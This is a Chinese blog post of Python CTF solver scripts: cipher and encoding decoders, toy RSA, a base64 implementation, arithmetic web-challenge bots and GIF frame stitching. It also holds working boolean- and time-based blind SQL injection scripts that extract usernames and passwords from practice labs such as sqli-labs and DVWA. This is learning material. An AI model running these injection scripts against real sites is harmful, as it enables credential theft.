python 写的一些ctf题脚本记录
文章目录
- python 写的一些ctf题脚本记录
-
- misc
- 16进制
- 凯撒
- 4进制
- 置换密码
- Unicode
- web计算
- rsa
- base64实现
- sql注入布尔
- gif图片帧拼接
misc
import base64
c = base64.b64decode("XlNkVmtUI1MgXWBZXCFeKY+AaXNt")
for i in c:
print(chr((i-16) ^ 32), end="")
import base64
str = "JiM3NjsmIzEyMjsmIzY5OyYjMTIwOyYjNzk7JiM4MzsmIzU2OyYjMTIwOyYjNzc7JiM2ODsmIzY5OyYjMTE4OyYjNzc7JiM4NDsmIzY1OyYjNTI7JiM3NjsmIzEyMjsmIzEwNzsmIzUzOyYjNzY7JiMxMjI7JiM2OTsmIzEyMDsmIzc3OyYjODM7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiMxMDc7JiMxMTg7JiM3NzsmIzg0OyYjNjU7JiMxMjA7JiM3NjsmIzEyMjsmIzY5OyYjMTIwOyYjNzg7JiMxMDU7JiM1NjsmIzEyMDsmIzc3OyYjODQ7JiM2OTsmIzExODsmIzc5OyYjODQ7JiM5OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzUwOyYjNzY7JiMxMjI7JiM2OTsmIzEyMDsmIzc4OyYjMTA1OyYjNTY7JiM1MzsmIzc4OyYjMTIxOyYjNTY7JiM1MzsmIzc5OyYjODM7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiM5OTsmIzExODsmIzc5OyYjODQ7JiM5OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzExOTsmIzc2OyYjMTIyOyYjNjk7JiMxMTk7JiM3NzsmIzY3OyYjNTY7JiMxMjA7JiM3NzsmIzY4OyYjNjU7JiMxMTg7JiM3NzsmIzg0OyYjNjU7JiMxMjA7JiM3NjsmIzEyMjsmIzY5OyYjMTE5OyYjNzc7JiMxMDU7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiM2OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzExOTsmIzc2OyYjMTIyOyYjMTA3OyYjNTM7JiM3NjsmIzEyMjsmIzY5OyYjMTE5OyYjNzc7JiM4MzsmIzU2OyYjMTIwOyYjNzc7JiM4NDsmIzEwNzsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzEyMDsmIzc2OyYjMTIyOyYjNjk7JiMxMjA7JiM3ODsmIzY3OyYjNTY7JiMxMjA7JiM3NzsmIzY4OyYjMTAzOyYjMTE4OyYjNzc7JiM4NDsmIzY1OyYjMTE5Ow=="
b_str = base64.b64decode(str.encode("utf-8"))
s = b_str.decode()
l = s.replace("&#", "")[0:-1].split(";")
new_s = ''
for i in l:
new_s += chr(int(i))
b_str = base64.b64decode(new_s.encode("utf-8"))
s = b_str.decode()
l = s[1:].split("/")
new_s = ''
for i in l:
new_s += chr(int(i))
print(new_s)
import base64
s = '升益艮归妹井萃旅离旅困未济屯未济中孚未济升困噬嗑鼎震巽噬嗑解节井萃离未济蒙归妹大畜无妄解兑临睽升睽未济无妄遁涣归妹'
dic = {'坤': '000000', '剥': '000001', '比': '000010', '观': '000011', '豫': '000100', '晋': '000101', '萃': '000110', '否': '000111', '谦': '001000', '艮': '001001', '蹇': '001010', '渐': '001011', '小过': '001100', '旅': '001101', '咸': '001110', '遁': '001111', '师': '010000', '蒙': '010001', '坎': '010010', '涣': '010011', '解': '010100', '未济': '010101', '困': '010110', '讼': '010111', '升': '011000', '蛊': '011001', '井': '011010', '巽': '011011', '恒': '011100', '鼎': '011101', '大过': '011110', '姤': '011111',
'复': '100000', '颐': '100001', '屯': '100010', '益': '100011', '震': '100100', '噬嗑': '100101', '随': '100110', '无妄': '100111', '明夷': '101000', '贲': '101001', '既济': '101010', '家人': '101011', '丰': '101100', '离': '101101', '革': '101110', '同人': '101111', '临': '110000', '损': '110001', '节': '110010', '中孚': '110011', '归妹': '110100', '睽': '110101', '兑': '110110', '履': '110111', '泰': '111000', '大畜': '111001', '需': '111010', '小畜': '111011', '大壮': '111100', '大有': '111101', '夬': '111110', '乾': '111111'}
l = []
k = 0
for i in range(len(s)):
if k == 1:
k = 0
continue
try:
l.append(dic[s[i]])
except:
l.append(dic[s[i]+s[i+1]])
k = 1
ss = ''.join(l)
enc = ''
for i in range(0, len(ss), 8):
enc += chr(eval('0b'+ss[i:i+8]))
s = base64.b64decode(enc).decode()
def encrypt4(enc):
temp = ''
offset = 5
for i in range(len(enc)):
temp += chr(ord(enc[i])-offset-i)
return(temp)
def decrypt4(enc):
temp = ''
offset = 5
for i in range(len(enc)):
temp += chr(ord(enc[i])+offset+i)
return(temp)
a, b = 5, 7
def encrpyt5(flag):
enc = ''
for i in flag:
enc += chr((a*(ord(i)-97)+b) % 26+97)
return(enc)
def decrypt5(flag):
enc = ''
for i in flag:
for k in range(20):
if (ord(i) - 97 - b+26*k) % a == 0:
enc += chr((ord(i) - 97 - b + 26 * k) // a + 97)
break
return(enc)
print(decrypt5(decrypt4(s)))
16进制
str = "61666374667B317327745F73305F333435797D"
for i in range(0, len(str), 2):
print(chr(int("0x"+str[i:i+2], 16)), end="")
str = "0x00000039 0x00000034 0x00000034 0x00000037 0x0000007b 0x00000079 0x0000006f 0x00000075 0x0000005f 0x00000061 0x00000072 0x00000065 0x0000005f 0x00000061 0x0000006e 0x0000005f 0x00000069 0x0000006e 0x00000074 0x00000065 0x00000072 0x0000006e 0x00000061 0x00000074 0x00000069 0x0000006f 0x0000006e 0x00000061 0x0000006c 0x0000005f 0x0000006d 0x00000079 0x00000073 0x00000074 0x00000065 0x00000072 0x00000079 0x0000007d"
for i in str.split():
print(chr(int(i, 16)), end="")
凯撒
from Crypto.Util.number import *
str = 16074357572745018593418837326290993512421736655307780242162599660198598253230550168811761868953242350136362894008095983571749530656901163555918436741973772511575306
passwd = long_to_bytes(str)
str = passwd.decode()
def change(key, str):
result = ""
for i in str:
if (i.islower()):
if((ord(i)+key) > 122):
result += chr(ord(i)+key-26)
else:
result += chr(ord(i)+key)
elif(i.isupper()):
if((ord(i)+key) > 90):
result += chr(ord(i)+key-26)
else:
result += chr(ord(i)+key)
else:
result += i
return result
for i in range(26):
print(change(i, str))
import base64
str = "CpakC3wpCpCpOZCpCpBwCpCpCl1pCpCpiT=="
def change(key, str):
result = ""
for i in str:
if (i.islower()):
if((ord(i)+key) > 122):
result += chr(ord(i)+key-26)
else:
result += chr(ord(i)+key)
elif(i.isupper()):
if((ord(i)+key) > 90):
result += chr(ord(i)+key-26)
else:
result += chr(ord(i)+key)
else:
result += i
return result
for i in range(26):
base_str = change(i, str)
try:
s=base64.b64decode(base_str)
print(s.decode())
except:
pass
4进制
str = "1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331"
print("".join([chr(int(i, 4)) for i in str.split()]))
置换密码
import base64
str = "Lrg|{R6{{QQ%O@pOjkiuP*YDuL_tzgNkvpePEu2SNlsKp"
str = base64.b85decode(str).decode()
l = [str[i:i+6] for i in range(0, len(str), 6)]
print("".join([i[0]+i[4]+i[2]+i[3]+i[5]+i[1] for i in l]))
str = "lfe{agdf7244bb47cd310b7b1d71e01c9e6d}c@@@@"
l = [str[i:i+6] for i in range(0, len(str), 6)]
for i in l:
print(i)
print("".join([i[1]+i[0]+i[4]+i[5]+i[3]+i[2] for i in l]))
Unicode
str = "0066006c00610067007b964452a096905199007d"
print("".join(["\\u"+str[i:i+4] for i in range(0, len(str), 4)]))
print(u'\u0066\u006c\u0061\u0067\u007b\u9644\u52a0\u9690\u5199\u007d')
web计算
import requests
from lxml import etree
url = "https://1360-b7e729ae-1747-44c2-bb53-e5f037516e48.do-not-trust.hacking.run/"
s = requests.Session()
r = s.get(url)
data = r.content.decode()
html = etree.HTML(data)
str = html.xpath("//p/text()")[1]
payload = {'result': eval(str), 'submit': '提交'}
r = s.post(url, data=payload)
print(r.text)
import re
import requests
url = "https://1360-fc9f2303-ec72-4f3d-a7bc-67e45ef7c32d.do-not-trust.hacking.run/"
s = requests.Session()
r = s.get(url).text
str = eval(re.findall(r'v>(.*)=', r)[0])
data = {'value': str}
r = s.post(url, data=data)
print(r.text)
rsa
import gmpy2
e = 13
p = 7
q = 11
m = 71
n = p * q
phi = (p-1)*(q-1)
d = gmpy2.invert(e, phi)
c = pow(m, e, n)
print(c)
import gmpy2
e = 13
p = 7
q = 11
c = 15
n = p * q
phi = (p-1)*(q-1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(m)
base64实现
l = "A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 + /".split()
ll = []
for i in range(len(l)):
t = bin(i)[2:]
if(len(t) != 6):
t = "0"*(6-len(t))+t
ll.append(t)
d = {}
for i in range(len(l)):
d[l[i]] = ll[i]
def xiao_e_base64(str):
b_str = ""
temp = ""
for i in str:
b = bin(ord(i))[2:]
if(len(b) != 8):
b_str += "0"*(8-len(b))+b
else:
b_str += b
f = len(b_str) % 3
b_str += "000000"*f
str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
for i in range(0, len(b_str), 6):
if("1" in b_str[i:i+6]):
temp += str[int(b_str[i:i+6], 2)]
return temp+"="*f
def xiao_d_base64(str):
b_str = ""
temp = ""
for i in str:
if(i == "="):
b_str += "000000"
else:
b_str += d[i]
for i in range(0, len(b_str), 8):
temp += chr(int(b_str[i:i+8], 2))
return temp
print(xiao_e_base64("Tr0y3uew"))
print(xiao_d_base64("VHIweTN1ZXc="))
import base64
d = {0: 'J', 1: 'K', 2: 'L', 3: 'M', 4: 'N', 5: 'O', 6: 'x', 7: 'y', 8: 'U', 9: 'V', 10: 'z', 11: 'A', 12: 'B', 13: 'C', 14: 'D', 15: 'E', 16: 'F', 17: 'G', 18: 'H', 19: '7', 20: '8', 21: '9', 22: 'P', 23: 'Q', 24: 'I', 25: 'a', 26: 'b', 27: 'c', 28: 'd', 29: 'e', 30: 'f', 31: 'g', 32: 'h',
33: 'i', 34: 'j', 35: 'k', 36: 'l', 37: 'm', 38: 'W', 39: 'X', 40: 'Y', 41: 'Z', 42: '0', 43: '1', 44: '2', 45: '3', 46: '4', 47: '5', 48: '6', 49: 'R', 50: 'S', 51: 'T', 52: 'n', 53: 'o', 54: 'p', 55: 'q', 56: 'r', 57: 's', 58: 't', 59: 'u', 60: 'v', 61: 'w', 62: '+', 63: '/', 64: '='}
l = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e',
'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/']
str = 'FlZNfnF6Qol6e9w17WwQQoGYBQCgIkGTa9w3IQKw'
ll = [l[i] for j in str for i in range(64) if j == d[i]]
str = "".join([i for i in ll])
print(base64.b64decode(str))
sql注入布尔
import requests
url = "http://xiu.com/sqli/Less-5/?id=1"
is_ture = "You are in......"
for x in range(1, 100):
r = requests.get(
url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")
if(is_ture in r.text):
break
for j in range(0, x):
for length in range(1, 100):
r = requests.get(
url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")
if(is_ture in r.text):
break
for k in range(1, length+1):
min = 32
max = 127
while abs(max - min) > 1:
mid = (max + min)//2
r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))>{mid} -- +")
if(is_ture in r.text):
min = mid
else:
max = mid
print(chr(max), end="")
print()
import requests
url = "http://xiu.com/DVWA/vulnerabilities/sqli_blind/?id=1"
suffix = "&Submit=Submit#"
is_ture = "User ID exists in the database."
table = "users"
columns1 = "first_name"
columns2 = "password"
cookies = 'security=low; bdshare_firstime=1638626761530; PHPSESSID=h6aumin31bcur15esl4o64ju61'
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}
for x in range(1, 100):
payload = f"'and (select count(concat({columns1},'@',{columns2})) from {table})={x} -- +{suffix}"
r = requests.get(url+payload, cookies=cookie)
if(is_ture in r.text):
break
for j in range(0, x):
for length in range(1, 100):
payload = f"'and (select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length} -- +{suffix}"
r = requests.get(url+payload, cookies=cookie)
if(is_ture in r.text):
break
for k in range(1, length+1):
min = 32
max = 127
while abs(max - min) > 1:
mid = (max + min)//2
payload = f"' and ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid} -- +{suffix}"
r = requests.get(url+payload, cookies=cookie)
if(is_ture in r.text):
min = mid
else:
max = mid
print(chr(max), end="")
print()
import requests
url = "http://xiu.com/sqli/Less-5/?id=1"
chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'
is_ture = "You are in......"
for x in range(1, 100):
r = requests.get( url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")
if(is_ture in r.text):
break
for j in range(0, x):
for length in range(1, 100):
r = requests.get( url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")
if(is_ture in r.text):
break
for k in range(1, length+1):
for i in chars:
r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)} -- +")
if(is_ture in r.text):
print(i, end="")
break
print()
import requests
from time import time
url = "http://xiu.com/sqli/Less-5/?id=1"
chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'
for x in range(1, 100):
t1=time()
r = requests.get(url+f"'and if((select count(concat(username,'@',password)) from users)={x},sleep(1),1) -- +")
t2=time()
if((t2-t1)>1):
break
for j in range(0, x):
for length in range(1, 100):
t1 = time()
r = requests.get(url+f"'and if((select length(concat(username,'@',password)) from users limit {j},1)={length},sleep(1),1) -- +")
t2 = time()
if((t2-t1) > 1):
break
for k in range(1, length+1):
for i in chars:
t1 = time()
r = requests.get( url+f"' and if(ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)},sleep(1),1) -- +")
t2 = time()
if((t2-t1) > 1):
print(i, end="")
break
print()
import requests
from time import time
url = "http://xiu.com/pikachu/vul/sqli/sqli_blind_b.php?name=vince"
suffix = "&submit=%E6%9F%A5%E8%AF%A2"
sleep_time = 0.5
table = "users"
columns1 = "username"
columns2 = "password"
cookies = '='
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}
for x in range(1, 100):
t1 = time()
payload = f"'and if((select count(concat({columns1},'@',{columns2})) from {table})={x},sleep({sleep_time}),1) -- +{suffix}"
r = requests.get(url+payload, cookies=cookie)
t2 = time()
if((t2-t1) > sleep_time):
break
for j in range(0, x):
for length in range(5, 100):
t1 = time()
payload = f"'and if((select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length},sleep({sleep_time}),1) -- +{suffix}"
r = requests.get(url+payload, cookies=cookie)
t2 = time()
if((t2-t1) > sleep_time):
break
for k in range(1, length+1):
min = 32
max = 127
while abs(max - min) > 1:
mid = (max + min)//2
t1 = time()
payload = f"' and if(ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid},sleep({sleep_time}),1) -- +{suffix}"
r = requests.get(url+payload, cookies=cookie)
t2 = time()
if((t2-t1) > sleep_time):
min = mid
else:
max = mid
print(chr(max), end="")
print()
gif图片帧拼接
from PIL import Image
im = Image.open('file.gif')
for i in range(770):
im.seek(i)
im.save('123/'+str(i)+'.png')
new_one = Image.new('RGB', (770, 432))
for j in range(770):
ima = Image.open('123/'+str(j)+'.png')
new_one.paste(ima, (j, 0, j+1, 432))
new_one.save("flag.png")
